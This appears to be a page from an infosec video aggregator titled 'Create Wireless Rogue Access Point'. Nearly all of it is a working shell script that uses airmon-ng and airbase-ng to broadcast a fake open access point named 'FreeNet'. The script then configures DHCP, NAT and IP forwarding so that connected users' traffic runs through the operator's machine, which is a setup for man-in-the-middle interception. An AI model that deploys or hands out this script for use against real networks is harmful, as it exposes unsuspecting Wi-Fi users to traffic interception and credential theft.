      pkill dhcpd3
      sleep 5;
      echo "Putting Wlan In Monitor Mode..."
      airmon-ng stop wlan0    # Change to your wlan interface
      sleep 5;
      airmon-ng start wlan0   # Change to your wlan interface
      sleep 5;
      echo "Starting Fake AP..."
      airbase-ng -e FreeNet -c 11 -v mon0 &   # Change essid, channel and interface
      sleep 5;
      ifconfig at0 up
      ifconfig at0 10.0.0.254 netmask 255.255.255.0   # Change IP addresses as configured in your dhcpd.conf
      route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
      sleep 5;
      iptables --flush
      iptables --table nat --flush
      iptables --delete-chain
      iptables --table nat --delete-chain
      iptables -P FORWARD ACCEPT
      iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE   # Change eth0 to your internet facing interface
      echo > '/var/lib/dhcp3/dhcpd.leases'
      ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
      dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
      sleep 5;
      echo "1" > /proc/sys/net/ipv4/ip_forward

      Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

      Original Source:

      Source: Create Wireless Rogue Access Point